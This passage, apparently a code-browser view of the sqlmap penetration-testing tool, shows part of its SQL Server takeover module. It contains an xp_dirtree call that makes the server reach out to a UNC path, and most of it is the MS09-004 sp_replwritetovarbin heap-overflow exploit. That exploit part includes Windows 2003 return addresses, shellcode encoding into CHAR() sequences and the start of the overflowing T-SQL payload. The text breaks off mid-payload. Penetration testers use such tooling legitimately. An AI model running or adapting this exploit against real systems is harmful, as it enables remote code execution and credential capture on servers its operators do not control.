References: * https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-004 * https://support.microsoft.com/en-us/help/959420/ms09-004-vulnerabilities-in-microsoft-sql-server-could-allow-remote-co
(self)
| 26 | inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath) |
| 27 | |
| 28 | def spHeapOverflow(self): |
| 29 | """ |
| 30 | References: |
| 31 | * https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-004 |
| 32 | * https://support.microsoft.com/en-us/help/959420/ms09-004-vulnerabilities-in-microsoft-sql-server-could-allow-remote-co |
| 33 | """ |
| 34 | |
| 35 | returns = { |
| 36 | # 2003 Service Pack 0 |
| 37 | "2003-0": (""), |
| 38 | |
| 39 | # 2003 Service Pack 1 |
| 40 | "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)"), |
| 41 | |
| 42 | # 2003 Service Pack 2 updated at 12/2008 |
| 43 | # "2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)"), |
| 44 | |
| 45 | # 2003 Service Pack 2 updated at 05/2009 |
| 46 | "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), |
| 47 | |
| 48 | # 2003 Service Pack 2 updated at 09/2009 |
| 49 | # "2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"), |
| 50 | } |
| 51 | |
| 52 | addrs = None |
| 53 | |
| 54 | for versionSp, data in returns.items(): |
| 55 | version, sp = versionSp.split("-") |
| 56 | sp = int(sp) |
| 57 | |
| 58 | if Backend.getOsVersion() == version and Backend.getOsServicePack() == sp: |
| 59 | addrs = data |
| 60 | |
| 61 | break |
| 62 | |
| 63 | if not addrs: |
| 64 | errMsg = "sqlmap can not exploit the stored procedure buffer " |
| 65 | errMsg += "overflow because it does not have a valid return " |
| 66 | errMsg += "code for the underlying operating system (Windows " |
| 67 | errMsg += "%s Service Pack %d)" % (Backend.getOsVersion(), Backend.getOsServicePack()) |
| 68 | raise SqlmapUnsupportedFeatureException(errMsg) |
| 69 | |
| 70 | shellcodeChar = "" |
| 71 | hexStr = binascii.hexlify(getBytes(self.shellcodeString[:-1])) |
| 72 | |
| 73 | for hexPair in xrange(0, len(hexStr), 2): |
| 74 | shellcodeChar += "CHAR(0x%s)+" % hexStr[hexPair:hexPair + 2] |
| 75 | |
| 76 | shellcodeChar = shellcodeChar[:-1] |
| 77 | |
| 78 | self.spExploit = """DECLARE @buf NVARCHAR(4000), |
| 79 | @val NVARCHAR(4), |
| 80 | @counter INT |
| 81 | SET @buf = ' |
| 82 | DECLARE @retcode int, @end_offset int, @vb_buffer varbinary, @vb_bufferlen int |
| 83 | EXEC master.dbo.sp_replwritetovarbin 347, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' |
| 84 | SET @val = CHAR(0x41) |
| 85 | SET @counter = 0 |
no test coverage detected